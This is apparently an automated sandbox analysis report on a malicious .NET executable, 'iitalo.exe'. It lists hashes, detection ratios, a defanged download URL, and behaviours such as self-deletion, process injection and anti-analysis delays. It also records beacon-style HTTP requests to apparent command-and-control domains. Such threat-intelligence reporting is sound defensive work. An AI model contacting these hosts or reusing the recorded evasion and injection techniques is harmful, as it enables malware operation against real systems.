File details Download PDF Report | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 1128.50 KB (1155584 bytes) |
Compile time: | 2019-04-05 10:39:59 |
MD5: | b3e470cd5e26765e5a878ac402613f8b |
SHA1: | 2b427ecaffb129b5f1e611c1c2ef7dd6bfaa2053 |
SHA256: | 7a45a2b29a69a2e4b8c37399af13cd81e999cc2b2e45cd18728dfa76dc90ffef |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 3 | import resource relocation |
First submission: | 2019-12-13 12:18:08 |
Last submission: | 2019-12-13 12:18:08 |
Filename detected: |
- iitalo.exe (1) |
URL file hosting |
---|
hXXp://23.95.200.195/44/iitalo.exe![]() |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2019-12-12 16:09:18 | [42/70] | ![]() |
PE Sections 1 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x119784 | 1153024 | 2a7182172e90cadd0056b8e6db00ba40 | 5a23654b0ff0314b79283deba588cfe412caad4d |
.rsrc | 0x11c000 | 0x5d2 | 1536 | 573bc6cd46641cf2b138e9d0d1344b34 | 68a8a3e5f3b5805a3f2d7e94e059d2821e02307b |
.reloc | 0x11e000 | 0xc | 512 | a635056c62cbb84b2a3f81032de6c984 | 624892e8d76a04c22c4c15b70bd5ed03ecad31a4 |
Meta Info | |
---|---|
No Meta found in this file |
XOR | |
---|---|
No XOR informations found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
FIle type: Library | |
mscoree.dll |
IP Found | |
---|---|
5.7.9.11 |
URL(s) | |
---|---|
No URL found |
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven02_64 | Seven02_64 | VirtualBox | 2019-12-13 12:16:32 | 2019-12-13 12:19:42 | 190 |
15 Behaviors detected by system signatures
Uses suspicious command line tools or Windows utilities
Severity: High
Confidence: High
- command: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Seven01\AppData\Local\Temp\iitalo.exe"
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: SURICATA HTTP Unexpected Request body
Attempts to repeatedly call a single API many times in order to delay analysis time
Severity: High
Confidence: Very High
- Spam: services.exe (480) called API GetSystemTimeAsFileTime 1579590 times
Deletes its original binary from disk
Severity: High
Confidence: Very High
Attempts to remove evidence of file being downloaded from the Internet
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Local\Temp\iitalo.exe:Zone.Identifier
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: iitalo.exe(1624) -> iitalo.exe(2708)
Uses Windows utilities for basic functionality
Severity: Medium
Confidence: High
- command: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Seven01\AppData\Local\Temp\iitalo.exe"
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://www.kotelhistory.online/i0i/?Ntilqz=2DR+mTUuoQzV6anS+9eom8POumR5dgzknzQvHlLbzdfq8+YY70iTcPMIrPY4NM/mjXeb25+s&7n=fdfpHTgHU2M0n
- url: http://www.kravtsev.com/i0i/?Ntilqz=gggd0SO4r0iRio8yGKQtiuEqcDs68QaN4OnfzNQ2coBdDvGUQZFXusSNEbQ7cA6Lcqf+mree&7n=fdfpHTgHU2M0n
- url: http://www.kravtsev.com/i0i/
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://www.kotelhistory.online/i0i/?Ntilqz=2DR+mTUuoQzV6anS+9eom8POumR5dgzknzQvHlLbzdfq8+YY70iTcPMIrPY4NM/mjXeb25+s&7n=fdfpHTgHU2M0n
- suspicious_request: http://www.kravtsev.com/i0i/?Ntilqz=gggd0SO4r0iRio8yGKQtiuEqcDs68QaN4OnfzNQ2coBdDvGUQZFXusSNEbQ7cA6Lcqf+mree&7n=fdfpHTgHU2M0n
- suspicious_request: http://www.kravtsev.com/i0i/
A process created a hidden window
Severity: Medium
Confidence: Very High
- Process: ipconfig.exe -> C:\Windows\SysWOW64\cmd.exe
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
- DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
- DynamicLoader: ADVAPI32.dll/RegEnumValueW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: mscoreei.dll/RegisterShimImplCallback
- DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
- DynamicLoader: mscoreei.dll/SetShellShimInstance
- DynamicLoader: mscoreei.dll/OnShimDllMainCalled
- DynamicLoader: mscoreei.dll/_CorExeMain_RetAddr
- DynamicLoader: mscoreei.dll/_CorExeMain
- DynamicLoader: SHLWAPI.dll/UrlIsW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: clr.dll/SetRuntimeInfo
- DynamicLoader: clr.dll/_CorExeMain
- DynamicLoader: MSCOREE.DLL/CreateConfigStream
- DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream
- DynamicLoader: KERNEL32.dll/GetNumaHighestNodeNumber
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/AddSIDToBoundaryDescriptor
- DynamicLoader: KERNEL32.dll/CreateBoundaryDescriptorW
- DynamicLoader: KERNEL32.dll/CreatePrivateNamespaceW
- DynamicLoader: KERNEL32.dll/OpenPrivateNamespaceW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/DeleteBoundaryDescriptor
- DynamicLoader: KERNEL32.dll/WerRegisterRuntimeExceptionModule
- DynamicLoader: KERNEL32.dll/RaiseException
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: mscoreei.dll/
- DynamicLoader: KERNELBASE.dll/SetSystemFileCacheSize
- DynamicLoader: ntdll.dll/NtSetSystemInformation
- DynamicLoader: KERNELBASE.dll/PrivIsDllSynchronizationHeld
- DynamicLoader: KERNEL32.dll/AddDllDirectory
- DynamicLoader: KERNEL32.dll/SortGetHandle
- DynamicLoader: KERNEL32.dll/SortCloseHandle
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: uxtheme.dll/ThemeInitApiHook
- DynamicLoader: USER32.dll/IsProcessDPIAware
- DynamicLoader: ole32.dll/CoGetContextToken
- DynamicLoader: clrjit.dll/sxsJitStartup
- DynamicLoader: clrjit.dll/getJit
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/QueryPerformanceFrequency
- DynamicLoader: KERNEL32.dll/QueryPerformanceCounter
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: USER32.dll/RegisterWindowMessage
- DynamicLoader: USER32.dll/RegisterWindowMessageW
- DynamicLoader: USER32.dll/GetSystemMetrics
- DynamicLoader: KERNEL32.dll/GetModuleHandle
- DynamicLoader: KERNEL32.dll/GetModuleHandleW
- DynamicLoader: KERNEL32.dll/LoadLibrary
- DynamicLoader: KERNEL32.dll/LoadLibraryW
- DynamicLoader: USER32.dll/AdjustWindowRectEx
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: KERNEL32.dll/GetCurrentThread
- DynamicLoader: KERNEL32.dll/DuplicateHandle
- DynamicLoader: KERNEL32.dll/GetCurrentThreadId
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/WideCharToMultiByte
- DynamicLoader: USER32.dll/DefWindowProcW
- DynamicLoader: GDI32.dll/GetStockObject
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/LocaleNameToLCID
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/LCIDToLocaleName
- DynamicLoader: KERNEL32.dll/GetUserPreferredUILanguages
- DynamicLoader: USER32.dll/RegisterClass
- DynamicLoader: USER32.dll/RegisterClassW
- DynamicLoader: MSCOREE.DLL/GetProcessExecutableHeap
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: USER32.dll/CreateWindowEx
- DynamicLoader: USER32.dll/CreateWindowExW
- DynamicLoader: USER32.dll/SetWindowLong
- DynamicLoader: USER32.dll/SetWindowLongW
- DynamicLoader: USER32.dll/GetWindowLong
- DynamicLoader: USER32.dll/GetWindowLongW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: nlssorting.dll/SortGetHandle
- DynamicLoader: nlssorting.dll/SortCloseHandle
- DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueEx
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: USER32.dll/SetWindowLong
- DynamicLoader: USER32.dll/SetWindowLongW
- DynamicLoader: USER32.dll/CallWindowProc
- DynamicLoader: USER32.dll/CallWindowProcW
- DynamicLoader: USER32.dll/GetClientRect
- DynamicLoader: USER32.dll/GetWindowRect
- DynamicLoader: USER32.dll/GetParent
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: KERNEL32.dll/GetSystemDefaultLCID
- DynamicLoader: KERNEL32.dll/GetSystemDefaultLCIDW
- DynamicLoader: GDI32.dll/GetStockObject
- DynamicLoader: GDI32.dll/GetObject
- DynamicLoader: GDI32.dll/GetObjectW
- DynamicLoader: USER32.dll/GetDC
- DynamicLoader: gdiplus.dll/GdiplusStartup
- DynamicLoader: KERNEL32.dll/IsProcessorFeaturePresent
- DynamicLoader: USER32.dll/GetWindowInfo
- DynamicLoader: USER32.dll/GetAncestor
- DynamicLoader: USER32.dll/GetMonitorInfoA
- DynamicLoader: USER32.dll/EnumDisplayMonitors
- DynamicLoader: USER32.dll/EnumDisplayDevicesA
- DynamicLoader: GDI32.dll/ExtTextOutW
- DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
- DynamicLoader: gdiplus.dll/GdipCreateFontFromLogfontW
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: KERNEL32.dll/RegOpenKeyExW
- DynamicLoader: KERNEL32.dll/RegQueryInfoKeyA
- DynamicLoader: KERNEL32.dll/RegCloseKey
- DynamicLoader: KERNEL32.dll/RegCreateKeyExW
- DynamicLoader: KERNEL32.dll/RegQueryValueExW
- DynamicLoader: KERNEL32.dll/RegEnumValueW
- DynamicLoader: KERNEL32.dll/RegQueryInfoKeyW
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: MSCOREE.DLL/ND_RI2
- DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
- DynamicLoader: mscoreei.dll/ND_RI2
- DynamicLoader: MSCOREE.DLL/ND_RU1
- DynamicLoader: mscoreei.dll/ND_RU1_RetAddr
- DynamicLoader: mscoreei.dll/ND_RU1
- DynamicLoader: gdiplus.dll/GdipGetFontUnit
- DynamicLoader: gdiplus.dll/GdipGetFontSize
- DynamicLoader: gdiplus.dll/GdipGetFontStyle
- DynamicLoader: gdiplus.dll/GdipGetFamily
- DynamicLoader: USER32.dll/ReleaseDC
- DynamicLoader: gdiplus.dll/GdipCreateFromHDC
- DynamicLoader: gdiplus.dll/GdipGetDpiY
- DynamicLoader: gdiplus.dll/GdipGetFontHeight
- DynamicLoader: gdiplus.dll/GdipGetEmHeight
- DynamicLoader: gdiplus.dll/GdipGetLineSpacing
- DynamicLoader: gdiplus.dll/GdipDeleteGraphics
- DynamicLoader: gdiplus.dll/GdipCreateFont
- DynamicLoader: gdiplus.dll/GdipDeleteFont
- DynamicLoader: KERNEL32.dll/CompareStringOrdinal
- DynamicLoader: KERNEL32.dll/GetFullPathName
- DynamicLoader: KERNEL32.dll/GetFullPathNameW
- DynamicLoader: KERNEL32.dll/SetThreadErrorMode
- DynamicLoader: KERNEL32.dll/GetFileAttributesEx
- DynamicLoader: KERNEL32.dll/GetFileAttributesExW
- DynamicLoader: KERNEL32.dll/ResolveLocaleName
- DynamicLoader: GDI32.dll/CreateCompatibleDC
- DynamicLoader: gdiplus.dll/GdipGetLogFontW
- DynamicLoader: MSCOREE.DLL/ND_WU1
- DynamicLoader: mscoreei.dll/ND_WU1_RetAddr
- DynamicLoader: mscoreei.dll/ND_WU1
- DynamicLoader: GDI32.dll/CreateFontIndirect
- DynamicLoader: GDI32.dll/CreateFontIndirectW
- DynamicLoader: GDI32.dll/SelectObject
- DynamicLoader: GDI32.dll/GetTextMetricsW
- DynamicLoader: GDI32.dll/GetTextExtentPoint32W
- DynamicLoader: GDI32.dll/DeleteDC
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: ole32.dll/CoCreateGuid
- DynamicLoader: KERNEL32.dll/GetCurrentProcessId
- DynamicLoader: KERNEL32.dll/GetCurrentProcessIdW
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/OpenProcess
- DynamicLoader: KERNEL32.dll/OpenProcessW
- DynamicLoader: psapi.dll/EnumProcessModules
- DynamicLoader: psapi.dll/EnumProcessModulesW
- DynamicLoader: psapi.dll/GetModuleInformation
- DynamicLoader: psapi.dll/GetModuleInformationW
- DynamicLoader: psapi.dll/GetModuleBaseName
- DynamicLoader: psapi.dll/GetModuleBaseNameW
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: psapi.dll/GetModuleFileNameEx
- DynamicLoader: psapi.dll/GetModuleFileNameExW
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: clr.dll/CreateAssemblyNameObject
- DynamicLoader: clr.dll/CreateAssemblyNameObjectW
- DynamicLoader: ole32.dll/CoGetObjectContext
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptGenRandom
- DynamicLoader: ole32.dll/NdrOleInitializeExtension
- DynamicLoader: ole32.dll/CoGetClassObject
- DynamicLoader: ole32.dll/CoGetMarshalSizeMax
- DynamicLoader: ole32.dll/CoMarshalInterface
- DynamicLoader: ole32.dll/CoUnmarshalInterface
- DynamicLoader: ole32.dll/StringFromIID
- DynamicLoader: ole32.dll/CoGetPSClsid
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: ole32.dll/CoReleaseMarshalData
- DynamicLoader: ole32.dll/DcomChannelSetHResult
- DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
- DynamicLoader: clr.dll/CreateAssemblyEnum
- DynamicLoader: clr.dll/CreateAssemblyEnumW
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: gdiplus.dll/GdipLoadImageFromStream
- DynamicLoader: WindowsCodecs.dll/DllGetClassObject
- DynamicLoader: KERNEL32.dll/WerRegisterMemoryBlock
- DynamicLoader: gdiplus.dll/GdipImageForceValidation
- DynamicLoader: gdiplus.dll/GdipGetImageType
- DynamicLoader: gdiplus.dll/GdipGetImageRawFormat
- DynamicLoader: gdiplus.dll/GdipGetImageWidth
- DynamicLoader: gdiplus.dll/GdipGetImageHeight
- DynamicLoader: gdiplus.dll/GdipGetImageEncodersSize
- DynamicLoader: KERNEL32.dll/LocalAlloc
- DynamicLoader: gdiplus.dll/GdipGetImageEncoders
- DynamicLoader: KERNEL32.dll/LocalFree
- DynamicLoader: gdiplus.dll/GdipSaveImageToStream
- DynamicLoader: gdiplus.dll/GdipCreateBitmapFromStream
- DynamicLoader: gdiplus.dll/GdipBitmapLockBits
- DynamicLoader: gdiplus.dll/GdipBitmapUnlockBits
- DynamicLoader: bcrypt.dll/BCryptGetFipsAlgorithmMode
- DynamicLoader: KERNEL32.dll/CreateFile
- DynamicLoader: KERNEL32.dll/CreateFileW
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/GetFileType
- DynamicLoader: ADVAPI32.dll/RegSetValueEx
- DynamicLoader: ADVAPI32.dll/RegSetValueExW
- DynamicLoader: ntdll.dll/NtSuspendProcess
- DynamicLoader: KERNEL32.dll/GetCurrentDirectory
- DynamicLoader: KERNEL32.dll/GetCurrentDirectoryW
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: KERNEL32.dll/GetCurrentProcessW
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
- DynamicLoader: KERNEL32.dll/CreateProcessW
- DynamicLoader: KERNEL32.dll/CreateProcessWW
- DynamicLoader: KERNEL32.dll/GetThreadContext
- DynamicLoader: KERNEL32.dll/GetThreadContextW
- DynamicLoader: ntdll.dll/ZwReadVirtualMemory
- DynamicLoader: ntdll.dll/ZwReadVirtualMemoryW
- DynamicLoader: KERNEL32.dll/VirtualAllocEx
- DynamicLoader: KERNEL32.dll/VirtualAllocExW
- DynamicLoader: KERNEL32.dll/WriteProcessMemory
- DynamicLoader: KERNEL32.dll/WriteProcessMemoryW
- DynamicLoader: KERNEL32.dll/SetThreadContext
- DynamicLoader: KERNEL32.dll/SetThreadContextW
- DynamicLoader: KERNEL32.dll/ResumeThread
- DynamicLoader: KERNEL32.dll/ResumeThreadW
- DynamicLoader: ntdll.dll/NtResumeProcess
- DynamicLoader: KERNEL32.dll/DeleteFile
- DynamicLoader: KERNEL32.dll/DeleteFileW
- DynamicLoader: ole32.dll/CoWaitForMultipleHandles
- DynamicLoader: gdiplus.dll/GdipDisposeImage
- DynamicLoader: USER32.dll/SetClassLong
- DynamicLoader: USER32.dll/SetClassLongW
- DynamicLoader: USER32.dll/PostMessage
- DynamicLoader: USER32.dll/PostMessageW
- DynamicLoader: USER32.dll/UnregisterClass
- DynamicLoader: USER32.dll/UnregisterClassW
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: GDI32.dll/DeleteObject
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/CreateActCtxW
- DynamicLoader: KERNEL32.dll/AddRefActCtx
- DynamicLoader: KERNEL32.dll/ReleaseActCtx
- DynamicLoader: KERNEL32.dll/ActivateActCtx
- DynamicLoader: KERNEL32.dll/DeactivateActCtx
- DynamicLoader: KERNEL32.dll/GetCurrentActCtx
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: uxtheme.dll/ThemeInitApiHook
- DynamicLoader: USER32.dll/IsProcessDPIAware
- DynamicLoader: MLANG.dll/
- DynamicLoader: WININET.dll/FindFirstUrlCacheEntryA
- DynamicLoader: kernel32.dll/SetFileInformationByHandle
- DynamicLoader: SHELL32.dll/SHGetFolderPathW
- DynamicLoader: urlmon.dll/CreateUri
- DynamicLoader: kernel32.dll/InitializeSRWLock
- DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
- DynamicLoader: kernel32.dll/AcquireSRWLockShared
- DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
- DynamicLoader: kernel32.dll/ReleaseSRWLockShared
- DynamicLoader: kernel32.dll/InitializeSRWLock
- DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
- DynamicLoader: kernel32.dll/AcquireSRWLockShared
- DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
- DynamicLoader: kernel32.dll/ReleaseSRWLockShared
- DynamicLoader: WININET.dll/FindNextUrlCacheEntryA
- DynamicLoader: WININET.dll/FindCloseUrlCache
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
- DynamicLoader: USER32.dll/GetWindowInfo
- DynamicLoader: USER32.dll/GetAncestor
- DynamicLoader: USER32.dll/GetMonitorInfoA
- DynamicLoader: USER32.dll/EnumDisplayMonitors
- DynamicLoader: USER32.dll/EnumDisplayDevicesA
- DynamicLoader: GDI32.dll/ExtTextOutW
- DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
- DynamicLoader: WindowsCodecs.dll/DllGetClassObject
- DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: kernel32.dll/SetThreadUILanguage
- DynamicLoader: kernel32.dll/CopyFileExW
- DynamicLoader: kernel32.dll/IsDebuggerPresent
- DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
Creates RWX memory
Severity: Medium
Confidence: Medium
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven02_64 | Seven02_64 | VirtualBox | 2019-12-13 12:16:32 | 2019-12-13 12:19:42 | 190 |
11 Summary items with data
Files
